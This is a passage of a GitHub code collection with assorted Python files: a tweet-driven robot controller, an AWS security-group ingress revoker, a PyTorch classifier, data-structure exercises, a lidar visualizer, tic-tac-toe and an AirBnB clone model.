quit: \")\n # if direction == \"q\":\n # break\n\n # runTime = raw_input(\"For how long?: \")\n # speed = raw_input(\"How Fast 0 - 100 %?: \")\n #speed = convertSpeed(speed)\n\n makeMove(mh, direction, speed, runTime)\n\t\n\nif __name__ == \"__main__\":\n\tlastID = 0\n\n\t# Prompt for movement parameters\n#\tmoveTime = raw_input(\"Enter the time for the robot to move: \")\n#\tmoveSpeed = raw_input(\"Enter the desired speed of the robot %: \")\n#\tmoveSpeed = convertSpeed(moveSpeed)\n\tmoveTime = 1\n\tmoveSpeed = 120\n\t\n\t\n\n\ttime.sleep(15)\n\tapi = twitterConnect()\n\t\t\n\twhile(True):\n\t\tstatus = readTwitter(api)\n\t\tif status[0].id == lastID:\n\t\t\tprint(\"no new tweets\")\n\t\t\ttime.sleep(10)\n\t\t\tcontinue\n\t\t\n\t\ttweetText = status[0].text\n\t\ttweetText = tweetText.lower()\n\t\tlastID = status[0].id\n\t \t\n\t\tprint(tweetText)\t\n\t\tdirection = mineTweetText(tweetText)\n\t\tmoveTheRobot(direction, moveSpeed, moveTime)\n\t\ttweetBack(status, api, direction)\n\n","repo_name":"kimjongdill/ControlTheConditioners","sub_path":"shitty_robot.py","file_name":"shitty_robot.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22414828812","text":"import boto3\n\ndef main():\n # Get a list of all AWS regions\n regions = [region['RegionName'] for region in boto3.client('ec2',region_name='us-east-1').describe_regions()['Regions']]\n\n for region in regions:\n # Call close_port_in_security_group for each region\n close_port_in_security_group(region)\ndef close_port_in_security_group(region_name):\n ec2 = boto3.client('ec2', region_name=region_name)\n\n # Get a list of all security groups in the specified region.\n security_groups = ec2.describe_security_groups()['SecurityGroups']\n\n # Iterate over each security group and check for open ports.\n for security_group in security_groups:\n ingress_rules = security_group['IpPermissions']\n ingress_rule_list = []\n\n if ingress_rules:\n for rule in ingress_rules:\n from_port = rule.get('FromPort', -1)\n to_port = rule.get('ToPort', -1)\n ip_protocol = rule.get('IpProtocol', None)\n ip_ranges = rule.get('IpRanges', [])\n ingress_rule_list.append({\n 'FromPort': from_port,\n 'ToPort': to_port,\n 'IpProtocol': ip_protocol,\n 'IpRanges': ip_ranges\n })\n print(ingress_rule_list)\n\n try:\n # Revoke the specified ingress rules for the port.\n ec2.revoke_security_group_ingress(GroupId=security_group['GroupId'], IpPermissions=ingress_rule_list)\n print(f'Successfully revoked ingress rules in security group {security_group[\"GroupId\"]} in region {region_name}')\n except Exception as e:\n print(f'Error revoking ingress rules in security group {security_group[\"GroupId\"]} in region {region_name}: {e}')\n else:\n print(f'No ingress rules found in the security group {security_group[\"GroupId\"]} in region {region_name}')\n\nif __name__ == '__main__':\n main()\n","repo_name":"manju-reddyy/port_monitoring","sub_path":"port_monitoring.py","file_name":"port_monitoring.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11989755416","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\n\n\n# 准备数据集\nclass DiabetesDataset(Dataset):\n def __init__(self, filepath): # filepath 表示数据来自什么地方\n # np.loadtxt为读取文本文档的函数\n xy = np.loadtxt(filepath, delimiter=',', dtype=np.float32)\n # shape为(N,9)元组,取出N的值\n self.len = xy.shape[0]\n # 第一个‘:’是指读取所有行,第二个‘:’是指从第一列开始,最后一列不要\n self.x_data = torch.from_numpy(xy[:, :-1])\n # 要最后一列,且最后得到的是个矩阵,所以要加[]\n self.y_data = torch.from_numpy(xy[:, [-1]])\n\n # 把里面的x_data[index],y_data[index]的第index条数据给拿出来\n def __getitem__(self, index):\n return self.x_data[index], self.y_data[index]\n\n # 把整个数据的数量取出来,返回数据集的数据条数\n def __len__(self):\n return self.len\n\n\ndataset = DiabetesDataset('C:\\ProgramData\\Anaconda3\\Lib\\pytorchtrains\\线性回归\\diabetes.csv') # 111.csv.gz数据路径\n# 用 DataLoader 构造了一个加载器\ntrain_loader = DataLoader(dataset=dataset, batch_size=32, shuffle=True, num_workers=2)\n\n\n# 设计模型\nclass Model(torch.nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.linearl1 = torch.nn.Linear(8, 6)\n self.linearl2 = torch.nn.Linear(6, 4)\n self.linearl3 = torch.nn.Linear(4, 1)\n self.sigmoid = torch.nn.Sigmoid()\n\n def forward(self, x):\n x = self.sigmoid(self.linearl1(x))\n x = self.sigmoid(self.linearl2(x))\n x = self.sigmoid(self.linearl3(x))\n return x\n\n\nmodel = Model()\n\n# 构造损失函数和优化器\ncriterion = torch.nn.BCELoss(reduction='mean')\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n\n# 训练\nif __name__ == '__main__':\n for epoch in range(100):\n # 对train_loader做迭代,用 enumerate是为了获得当前是第几次迭代\n # 把从train_loader拿出来的(x,y)元组放到data里面\n for i, data in enumerate(train_loader, 0):\n # 在训练之前把x,y从data里面拿出来,inputs=x,labels=y,\n # 此时inputs,labels都已经被自动转换为张量(tensor)\n inputs, labels = data\n\n # Forward\n y_pred = model(inputs)\n loss = criterion(y_pred, labels)\n print(epoch, i, loss.item())\n\n # backward\n optimizer.zero_grad()\n loss.backward()\n # update\n optimizer.step()","repo_name":"guessuppp/-Pytorchtrains-","sub_path":"加载数据及2.py","file_name":"加载数据及2.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4579612334","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\nclass Queue:\n def __init__(self):\n self.front=None\n self.rear=None\n\n def enqueue(self):\n n=input(\"Enter the element you want to insert in queue\")\n new=Node(n)\n if self.front is None:\n self.front=new\n self.rear=new\n else:\n self.rear.next=new\n self.rear=new\n \n def dequeue(self):\n if self.front is None:\n print(\"Queue is empty\")\n elif self.front.next is None:\n print(\"Popped element is: \",self.front.data)\n self.front=None\n else:\n temp=self.front\n print(\"Popped element is: \",self.front.data)\n self.front=temp.next\n temp=None\n\n\n def display(self):\n if self.front is None:\n print(\"Queue is empty\")\n else:\n print(\"Displaying the elements of the queue\")\n temp=self.front\n while temp:\n print(temp.data,\"-->\",end=\" \")\n temp=temp.next\n\n print(\"\\nFront of the queue is: \",self.front.data)\n print(\"\\nRear of the queue is: \",self.rear.data)\n\n\n\n\nq=Queue()\nwhile(1):\n print(\"\\n Enter the option: \\n 1-Enqueue Operation \\n 2-Dequeue Operation \\n 3-Display \\n 4-Enter any key to break the loop\")\n user_option=int(input())\n if user_option==1:\n print(\"Enqueue operation\")\n q.enqueue()\n elif user_option==2:\n print(\"Dequeue Operation\")\n q.dequeue()\n elif user_option==3:\n print(\"Display Operation\")\n q.display()\n else:\n print(\"EXIT From the loop\")\n break","repo_name":"pritha06/sde-bootcamp","sub_path":"stack and queue/queue_basic_operations_using_linked_list.py","file_name":"queue_basic_operations_using_linked_list.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24588607133","text":"# A binary tree node \nclass Node: \n\n\t# Constructor to create a new node \n\tdef __init__(self, data): \n\t\tself.data = data \n\t\tself.left = None\n\t\tself.right = None\n\n\n# Recursive function pritn left view of a binary tree \ndef rightViewUtil(root, level, max_level): \n\t\n\t# Base Case \n\tif root is None: \n\t\treturn\n\n\tif (max_level[0] < level): \n\t\tprint(\"% d\\t\" %(root.data))\n\t\tmax_level[0] = level \n\n\trightViewUtil(root.right, level + 1, max_level) \n\trightViewUtil(root.left, level + 1, max_level)\n\ndef rightView(root): \n\tmax_level = [0] \n\trightViewUtil(root, 1, max_level) \n \nroot = Node(12) \nroot.left = Node(10) \nroot.right = Node(20) \nroot.right.left = Node(25) \nroot.right.right = Node(40) \n\nrightView(root) ","repo_name":"annshiv/100day-coding-challenge","sub_path":"day 19/bin_right.py","file_name":"bin_right.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"24837639262","text":"import numpy as np\nimport pyHilbertCpp as hilbert \nfrom ParticleContainer import ParticleContainer, testfun_verify_verlet_list\nfrom fcc import FCC\nimport math\n\n\"\"\"\n3374 255 1 2 4\n3375 255 1 2 4\n3376 255 2 2 3\n3377 255 2 2 3\n3378 255 2 2 4\n3379 255 2 2 4\n3380 255 2 2 3\n3381 255 2 2 3\n3382 255 2 2 4\n\"\"\"\nprint(hilbert.ijk2h_1(1,2,4))\nprint(hilbert.ijk2h_1(2,2,3))\nexit()\nnB = 10\nn_atoms = 4*nB**3\natoms = ParticleContainer(n_atoms,arrays='raih')\n\nrmin = math.pow(2,1/6)\na = math.sqrt(2)*rmin\noffset = np.ones((3,))*(0.25*a)\natoms.rx,atoms.ry,atoms.rz,nb = FCC(n_atoms,a=a,offset=offset,verbose=False)\nassert nb==nB\n\nrcutoff = 3*rmin\natoms.compute_ijk_h(cell_width=rcutoff)\natoms.build_tables(rcutoff=rcutoff,reserve_atoms_per_cell=80,reserve_verlet=200,verbose=True)\n\nfor i in range(n_atoms):\n print(i,atoms.h[i],atoms.i[i],atoms.j[i],atoms.k[i])\n\nH = atoms.hilbert_list.shape\nfor i in range(H[1]):\n print(i, atoms.hilbert_list[0,i], atoms.hilbert_list[1,i])","repo_name":"etijskens/hpc-tnt-1.2","sub_path":"pyMD/testje.py","file_name":"testje.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73373436214","text":"# coding=utf-8\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom mpl_toolkits.mplot3d import Axes3D # 导入Axes3D类\r\n\r\nfig = plt.figure() # 获取到当前figure对象\r\nfig.set_size_inches(10, 5) # 设置图片尺寸,以inches为单位\r\nax = fig.gca(projection='3d') # 获取图中的当前极轴(如果不存在或者不是极轴,则将创建相应的轴),返回的类型是Axes3D的子类\r\n\r\nx = np.linspace(-10, 10, 1000) # # 创建指定范围和元素数量的数组,这里x和y轴的范围都是[-10, 10]\r\ny = np.linspace(-10, 10, 1000) # 每一个点都由[x,y,z]三个坐标值来确定,x,y,z三个数组的元素数量应该相同\r\nz = np.add(x, y) # np.add是元素级(element-wise)的运算:将x和y两个数组的元素逐个相加,结果仍然是包含1000个元素的数组\r\n\r\nax.plot(x, y, z) # 绘制3D线形图\r\nplt.show()\r\n\r\n# ### 立体绘图(3D plotting)\r\n# 通过Matplotlib可以绘制3D图形;\r\n# - Tutorials:https://matplotlib.org/tutorials/toolkits/mplot3d.html\r\n# - Examples:https://matplotlib.org/gallery/index.html#d-plotting\r\n# - API:https://matplotlib.org/api/toolkits/mplot3d.html\r\n#\r\n# ### Axes3D\r\n# API:https://matplotlib.org/api/_as_gen/mpl_toolkits.mplot3d.axes3d.Axes3D.html\r\n# 本文涉及的绘制3D图形函数都位于此接口;\r\n# 一些常用函数:\r\n# - plot():绘制3D线形图\r\n# - scatter(): 绘制3D散点图\r\n# - plot_wireframe():绘制3D线框图\r\n# - plot_surface():绘制3D曲面图\r\n# - contour():绘制3D等高线\r\n# - bar():绘制3D柱状图\r\n# - add_collection3d():向图形中添加3D集合对象,可用来绘制3D多边形\r\n","repo_name":"anliven/Hello-Data","sub_path":"Matplotlib/Matplotlib07_3D_plot.py","file_name":"Matplotlib07_3D_plot.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38113615095","text":"import random\r\n\r\nN = 3\r\nGAME = ['•', '•', '•', '•', '•', '•', '•', '•', '•']\r\n\r\n\r\ndef print_pole():\r\n for i in range(N):\r\n print(GAME[3 * i], GAME[3 * i + 1], GAME[3 * i + 2])\r\n\r\n\r\ndef game_continues():\r\n for i in range(N):\r\n if GAME[i] == GAME[i + 3] == GAME[i + 6] == 'X':\r\n print(\"Крестики выиграли\")\r\n return False\r\n if GAME[i] == GAME[i + 3] == GAME[i + 6] == '0':\r\n print(\"Нолики выиграли\")\r\n return False\r\n for i in (0, 3, 6):\r\n if GAME[i] == GAME[i + 1] == GAME[i + 2] == 'X':\r\n print(\"Крестики выиграли\")\r\n return False\r\n if GAME[i] == GAME[i + 1] == GAME[i + 2] == '0':\r\n print(\"Нолики выиграли\")\r\n return False\r\n if GAME[0] == GAME[4] == GAME[8] == 'X':\r\n print(\"Крестики выиграли\")\r\n return False\r\n if GAME[0] == GAME[4] == GAME[8] == '0':\r\n print(\"Нолики выиграли\")\r\n return False\r\n if GAME[2] == GAME[4] == GAME[6] == 'X':\r\n print(\"Крестики выиграли\")\r\n return False\r\n if GAME[2] == GAME[4] == GAME[6] == '0':\r\n print(\"Нолики выиграли\")\r\n return False\r\n\r\n dots = 0\r\n for i in range(9):\r\n if GAME[i] == '•': dots += 1\r\n if dots > 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef go_player():\r\n if game_continues():\r\n input_cycle = True\r\n\r\n while input_cycle:\r\n x, y = input(\"Введите координаты: \").split()\r\n if not x.isdigit() or not y.isdigit():\r\n print(\"Неверные координаты\")\r\n continue\r\n else:\r\n x = int(x) - 1\r\n y = int(y) - 1\r\n if x > 2 or y > 2 or x < 0 or y < 0 or GAME[x * N + y] == '0':\r\n print(\"Неверные координаты\")\r\n else:\r\n input_cycle = False\r\n return x, y\r\n\r\n\r\ndef go_computer():\r\n rng = random.Random()\r\n comp_cycle = True\r\n while comp_cycle:\r\n x = rng.randrange(N)\r\n y = rng.randrange(N)\r\n if GAME[x * N + y] == '•':\r\n comp_cycle = False\r\n return x, y\r\n\r\n\r\ndef game_process():\r\n print_pole()\r\n while game_continues():\r\n x, y = go_player()\r\n GAME[x * N + y] = 'X'\r\n if game_continues():\r\n x, y = go_computer()\r\n GAME[x * N + y] = '0'\r\n print_pole()\r\n\r\n\r\ngame_process()\r\n\r\n","repo_name":"AOvsyannikov1/My_progs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5631440076","text":"import sys\nsys.stdin = open('input.txt')\n\n\ndef in_order(v):\n if v <= N:\n in_order(v*2)\n print(alp_lst[v], end='')\n in_order(v*2+1)\n\nT = 10\nfor tc in range(1, T+1):\n N = int(input())\n alp_lst = [0] * (N+1)\n for i in range(N):\n li = list(input().split())\n alp_lst[i+1] = li[1]\n print(f'#{tc}', end=' ')\n in_order(1)\n print()\n\n","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/SWEA/1231_중위순회/1231_중위순회.py","file_name":"1231_중위순회.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24118050725","text":"from django.core.validators import MinLengthValidator\nfrom django.db import models\n\nfrom petstagram.basic.model_mixins import StrFromFieldsMixin\nfrom petstagram.basic.validators import validate_image_less_than_5mgb\nfrom petstagram.pets.models import Pet\n\n\n# Create your models here.\n\n\nclass Photo(StrFromFieldsMixin, models.Model):\n str_fields = ('photo', 'location')\n\n MEDIA_FILES = 'mediafiles/pet_photo/'\n MIN_DESCRIPTION_LENGTH = 10\n MAX_DESCRIPTION_LENGTH = 300\n\n MAX_LOCATION_LENGTH = 30\n\n # Requires mediafiles to work correctly\n photo = models.ImageField(\n upload_to=MEDIA_FILES,\n validators=(validate_image_less_than_5mgb,),\n null=False,\n blank=True,\n )\n\n description = models.CharField(\n max_length=MAX_DESCRIPTION_LENGTH,\n validators=(\n # Django/python validation not DV Validation\n MinLengthValidator(MIN_DESCRIPTION_LENGTH),\n ),\n null=True,\n blank=True,\n )\n\n location = models.CharField(\n max_length=MAX_LOCATION_LENGTH,\n null=True,\n blank=True,\n )\n\n publication_date = models.DateField(\n auto_now=True,\n null=False,\n blank=True,\n )\n\n tagged_pets = models.ManyToManyField(\n Pet,\n blank=True,\n )\n","repo_name":"Orminis/petstagram","sub_path":"petstagram/photos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18239015461","text":"n, m = map(int, input().split())\na = list(map(int, input().split()))\n\n\ndef check(a, mid):\n l = len(a)\n t1 = a[0]\n t2 = a[0]\n ans = 1\n for i in range(1, l):\n if t1 > a[i]:\n t1 = a[i]\n # 최소값만들기\n if t2 < a[i]:\n t2 = a[i]\n # 최대값 만들기\n if t2-t1 > mid:\n ans += 1\n t1 = a[i]\n t2 = a[i]\n return ans\n\n\nleft = 0\nright = max(a)\nans = right\nwhile left <= right:\n mid = (left + right) // 2\n if check(a, mid) <= m:\n if ans > mid:\n ans = mid\n right = mid - 1\n\n else:\n left = mid + 1\n\nprint(ans)\n\n","repo_name":"yeonnseok/ps-algorithm","sub_path":"2019 baekjoon/BinarySearch/13397_divide2.py","file_name":"13397_divide2.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3315785856","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 31 09:04:56 2018\n\n@author: ivan\n\nVisualizer for the Lidar's data. It can used with both Hokuyo and the rpLidar. It contains the core/bare minimum functions to get the data\ntransform it, calculate necessary angles and orientations, correct the data and display it.\n\nTo be fully working the script needs both a lidar and a IMU/Arduino combo, but with small changes \n\"\"\"\n\n# Default imports\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport serial\n\n\n# LiDAR driver/library import - UTM-30LX lidar and rpLiDAR \nimport UTM_30LX as lx\n\nfrom rplidar import RPLidar\nfrom rplidar import RPLidarException\n\n# Imports from the helper library - lite version that does not contains only the necessary minimum. They are explained in the library itself\nfrom helperFunctions_lite import calculateMeans, circle2cart_drone, circle2cart_points, calculateAnglesPCA, testEllipse, calculateMinMax, intersectionLineCurve,getDataFromIMU\n\n#Class for animating the visualization\nclass AnimatedScatter(object):\n \"\"\"An animated scatter plot using matplotlib.animations.FuncAnimation. WhichLidar -> 0 = rplidar, 1 = NONE, 2 = hokuyo\n MaxRange, AxisRange - ranges only for visualization\n lidarMinThresh, lidarMaxThresh - distance thresholds for what data is taken from the lidar reading\n whichCenter - only for demonstration purposes - if 0 then lidar is center of coordinate system, if 1 then the lidar's position is calculated from all it's readings to a arbitrary 0 based coordinate system\n \"\"\"\n \n def __init__(self,portName = '/dev/ttyACM0', maxRange = 30000, axisRange = 10000, whichLidar = 2, lidarMinThresh = 500, lidarMaxThresh = 5000, whichCenter = 0):\n \n #===============================================================#\n #=================== Initialization Block ======================#\n #===============================================================#\n \n self.maxRange = maxRange\n self.axisRange = axisRange\n \n self.whichLidar = whichLidar\n self.portName = portName\n \n self.lidarMinThresh = lidarMinThresh\n self.lidarMaxThresh = lidarMaxThresh\n \n self.whichCenter = whichCenter\n \n # global variables \n self.anglePCA = 0 # angle of the blade points, calculated using PCA\n self.PCACalculated = False # helper bool for determining if blade angle calculated\n \n self.environmentPoints = [] # detected points from blade\n\n self.calculateEllipse = False # is the ellipse calculated\n \n self.ellipseAlgStart = False # is the elliptical algorithm running\n\n \n self.serial_IMU = serial.Serial(\"COM10\",57600) # IMU + arduino serial, if no IMU is present please comment out\n \n self.arduinoInitial = np.zeros(8)#if no IMU is present please comment out\n self.lidarRotAngle = 0 # lidar rotation angle , if no IMU is present please comment out\n \n self.armedAngle = 0 # lidar angle when the blade angle is calculated, used as an initial angle, if no IMU is present please comment out\n \n # initialize lidar - in case of the rpLidar an initial health check is required to be sure that the proper data is sent \n if self.whichLidar is 0:\n \n self.lidar = RPLidar(self.portName)\n \n print(\"Starting Lidar...\")\n ## Start Lidar and get's info\n while True:\n try:\n \n info = self.lidar.get_health()\n \n \n break\n except RPLidarException:\n \n print(\"Lidar error retry\")\n finally:\n self.lidar.stop()\n \n print(info)\n \n self.iterator = self.lidar.iter_scans(1000,5,100,6000)\n \n elif self.whichLidar is 1:\n pass\n # The sweep lidar is removed as it is not currently used \n \n \n elif self.whichLidar is 2:\n\n self.lidar = lx.connect(self.portName) \n \n lx.startLaser(self.lidar)\n\n #===============================================================#\n #========================== BLOCK END ==========================#\n #===============================================================#\n \n \n #===============================================================#\n #================== Setup figures and events ===================#\n #===============================================================#\n \n # Setup the figure and axes...\n self.fig, self.ax = plt.subplots()\n \n self.fig.canvas.mpl_connect('close_event', self.handle_close) # event for clicking the X\n \n self.onClickEv = self.fig.canvas.mpl_connect('button_press_event', self.on_click) # event for clicking the mouse button\n # Then setup FuncAnimation. - self.update is the update function, while self.setup_plot is the initialization of figures\n self.ani = animation.FuncAnimation(self.fig, self.update, interval=1./40, \n init_func=self.setup_plot, blit=True)\n \n \n #===============================================================#\n #========================== BLOCK END ==========================#\n #===============================================================#\n\n\n # Handler function for closing the figure, each lidar has different exit strategies \n def handle_close(self,evt):\n print('Closed Figure!')\n \n self.fig.canvas.mpl_disconnect(self.onClickEv) \n self.serial_IMU.close() # disconnect IMU serial, if no IMU is present please comment out\n if self.whichLidar is 0:\n \n self.lidar.stop()\n self.lidar.stop_motor()\n self.lidar.disconnect()\n elif self.whichLidar is 1:\n pass\n \n elif self.whichLidar is 2:\n self.lidar.close()\n \n # Handler function for mouse click on the canvas \n def on_click(self, evt):\n \n # if the blade points orientation is calculated and the elliptical alg is not started - start it now \n if self.PCACalculated == True and self.ellipseAlgStart == False:\n self.ellipseAlgStart = True\n \n # if the blade points orientation is not calculated - do it \n if self.PCACalculated == False:\n \n self.anglePCA = calculateAnglesPCA(self.environmentPoints)\n self.PCACalculated = True\n \n print(self.anglePCA)\n \n \n print(\"Clicked\")\n \n # Setup function for plotting \n def setup_plot(self):\n\n \"\"\"Setup static markings.\"\"\"\n\n # Setup axis limits\n self.ax.axis([-self.axisRange, self.axisRange, -self.axisRange, self.axisRange])\n\n # Create updating scatter plot and variable for later use\n self.scat = self.ax.scatter([], [], c='b', s=1, animated=True, alpha=0.5)\n \n self.scat_lidar = self.ax.scatter([], [], c='r', s=30, animated=True, alpha=0.5)\n \n self.scat_ellipse = self.ax.scatter([], [], c='g', s=20, animated=True, alpha=0.5)\n\n # For FuncAnimation's sake, we need to return the artist we'll be using\n # Note that it expects a sequence of artists, thus the trailing comma.\n return self.scat,self.scat_lidar,self.scat_ellipse,\n\n def update(self, i):\n \"\"\"Update the scatter plot.\"\"\"\n \n # Update function runs and gets data from the Lidar \n if self.whichLidar is 0:\n scan = next(self.iterator)\n angleDistance = np.array(scan) \n \n elif self.whichLidar is 1:\n pass\n \n elif self.whichLidar is 2:\n # 0 and 1080 is the degrees that the Hokuyo gets readings from - 0 to 180 degrees, as it checks in 6 increments between a degree\n # the last value of 1 signifies if the data will be clustered - if it's 1 data is not averaged by captures \n angleDistance, status = lx.getLatestScanSteps(self.lidar, 0, 1080,1)\n \n # Remove data that is farther or closer than the thresholds \n angleDistance = angleDistance[np.logical_and(angleDistance[:,1] > self.lidarMinThresh, angleDistance[:,1] < self.lidarMaxThresh)]\n \n # Used only for testing/visualization purposes - when 0 only the environment points are printed and the lidar is always at 0,0 \n if self.whichCenter == 0:\n \n environmentPoints = circle2cart_points([0,0],angleDistance, 0)\n lidarPoint = [0,0]\n # Start real algorithm \n elif self.whichCenter == 1:\n \n # Get orientation data from IMU, if no IMU present comment out the next three lines \n arduinoOutput = getDataFromIMU(self.serial_IMU,self.arduinoInitial)\n self.arduinoInitial = arduinoOutput\n self.lidarRotAngle = arduinoOutput[4]\n\n # if the elliptical algorithm is started compensate for the lidar's rotation \n if self.ellipseAlgStart is True:\n\n compensateYaw = self.lidarRotAngle - self.armedAngle # current rotation angles - the armed angle\n \n angleDistance[:,0] = angleDistance[:,0] + compensateYaw \n \n # Calculate mean angle and mean distance \n meanAngle,meanDist = calculateMeans(angleDistance)\n \n # go from polar to carthesian system - position the lidar at a 0,0 coordinate system, then reproject blade points from the lidar's position \n lidarPoint = circle2cart_drone([0,0],meanAngle, meanDist)\n environmentPoints = circle2cart_points(lidarPoint,angleDistance, 0)\n \n self.environmentPoints = environmentPoints\n \n # is the blade orientation calculated\n if self.PCACalculated is True:\n \n \n if self.calculateEllipse is False:\n # Calculate ellipse - first get the major diameter of the ellipse\n minDist,maxDist,minDist_points,maxDist_points = calculateMinMax(self.environmentPoints)\n \n # create ellipse using the major diameter, and major diameter/6 as minor diameter, the angle of rotation and a 0,0 center\n ellipseRadAngle, self.ellipseBladePoints = testEllipse(int(maxDist/6), int(maxDist), self.anglePCA, [0,0])\n self.calculateEllipse = True\n \n # save the armed angle of lidar orientation\n self.armedAngle = self.lidarRotAngle\n \n if self.ellipseAlgStart is True:\n \n # get the average detected point position\n averagePointPos=[sum(environmentPoints[:,0])/len(environmentPoints[:,0]),sum(environmentPoints[:,1])/len(environmentPoints[:,1])]\n pCenter=np.array((0,0))\n pAvg = np.array((averagePointPos[0],averagePointPos[1]))\n # calculate the distance between the ellipse center and the point\n distAveragePointToZero = np.linalg.norm(pCenter-pAvg)\n \n # find the intersection between the ellipse the center of the ellipse and the lidar position\n intersectPointOnCurve = intersectionLineCurve([0,0], lidarPoint, self.ellipseBladePoints)\n \n # calculate correction distance - ellipse radius \n correctionDist = math.sqrt(intersectPointOnCurve[0]**2 + intersectPointOnCurve[1]**2)\n # calculate new center for going from polar to carthesian using the correction distance and the dist of the average point to zero\n newCenterPos = circle2cart_drone([0,0],meanAngle, correctionDist -distAveragePointToZero)\n \n lidarPoint = circle2cart_drone(newCenterPos,meanAngle, meanDist)\n \n environmentPoints = circle2cart_points(lidarPoint,angleDistance, 0)\n # visualize ellipse\n self.scat_ellipse.set_offsets(self.ellipseBladePoints)\n\n\n # Visualize environment and lidar points \n self.scat.set_offsets(environmentPoints)\n \n self.scat_lidar.set_offsets(lidarPoint)\n\n # We need to return the updated artist for FuncAnimation to draw..\n # Note that it expects a sequence of artists, thus the trailing comma.\n return self.scat,self.scat_lidar,self.scat_ellipse,\n\n def show(self):\n plt.show()\n \n\n\n\nif __name__ == '__main__':\n\n \n a = AnimatedScatter(\"COM9\",1000,1000,2, 100, 300, 1)\n a.show()","repo_name":"IvanNik17/Testing-and-Visualizing-rpLiDAR-and-Hokuyo-UTM-30LX","sub_path":"LiDAR_animate.py","file_name":"LiDAR_animate.py","file_ext":"py","file_size_in_byte":13206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4746397713","text":"#!/usr/bin/python3\n\"\"\"\ndefines all common attributes/mothods for other classes\n\"\"\"\n\nfrom datetime import datetime\nimport uuid\nfrom datetime import datetime\nimport models\nimport sqlalchemy\nfrom sqlalchemy import Column, String, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\n\ntime = \"%Y-%m-%dT%H:%M:%S.%f\"\n\nif models.storage_t == \"db\":\n Base = declarative_base()\nelse:\n Base = object\n\n\nclass BaseModel:\n \"\"\"Base for all AirBnB website projects\"\"\"\n\n if models.storage_t == \"db\":\n id = Column(String(60), primary_key = True)\n created_at = Column(DateTime, default=datetime.utcnow)\n updated_at = Column(DateTime, default=datetime.utcnow)\n\n def __init__(self, *args, **kwargs):\n \"\"\"initializes the basemodel class\"\"\"\n if not kwargs:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.utcnow()\n self.updated_at = self.created_at\n models.storage.new(self)\n elif kwargs:\n for key, value in kwargs.items():\n if key != '__class__':\n setattr(self, key, value)\n if kwargs.get(\"created_at\", None) and type(self.created_at) is str:\n self.created_at = datetime.strptime(kwargs[\"created_at\"], time)\n else:\n self.created_at = datetime.utcnow()\n if kwargs.get(\"updated_at\", None) and type(self.updated_at) is str:\n self.updated_at = datetime.strptime(kwargs[\"updated_at\"], time)\n else:\n self.updated_at = datetime.utcnow()\n if kwargs.get(\"id\", None) is None:\n self.id = str(uuid.uuid4())\n\n def __str__(self):\n \"\"\"returns string representation of this class\"\"\"\n name = self.__class__.__name__\n return \"[{}] ({}) {}\".format(name, self.id, self.__dict__)\n\n def save(self):\n \"\"\"updates updated_at with the current datetime\"\"\"\n self.updated_at = datetime.utcnow()\n models.storage.new(self)\n models.storage.save()\n\n def to_dict(self):\n \"\"\"returns the dictionary containing all keys of __dict__\"\"\"\n new_dict = self.__dict__.copy()\n if \"created_at\" in new_dict:\n new_dict[\"created_at\"] = new_dict[\"created_at\"].strftime(time)\n if \"updated_at\" in new_dict:\n new_dict[\"updated_at\"] = new_dict[\"updated_at\"].strftime(time)\n new_dict[\"__class__\"] = self.__class__.__name__\n if \"_sa_instance_state\" in new_dict:\n del new_dict[\"_sa_instance_state\"]\n return new_dict\n\n def delete(self):\n \"\"\"delete the current instance from the starage\"\"\"\n models.storage.delete(self)\n","repo_name":"sebagadisk/AirBnB_clone_v2","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35865778379","text":"import sys\n\ninput = sys.stdin.readline\n# 숫자 개수, 플레이어 수, 선물 위치, 라운드의 수\nn, k, p, l = map(int, input().split())\narr = [list(map(int, input().split())) for _ in range(k)]\n\nplayer, rnd = -1, 1\ncur = 1\nis_winner = False\nfor i in range(l): # l라운드\n for j in range(k): # k명\n turn = arr[j][i]\n # 회전\n for _ in range(turn):\n if cur == 1:\n cur = n\n else:\n cur -= 1\n if cur == p:\n print(j+1, i+1)\n 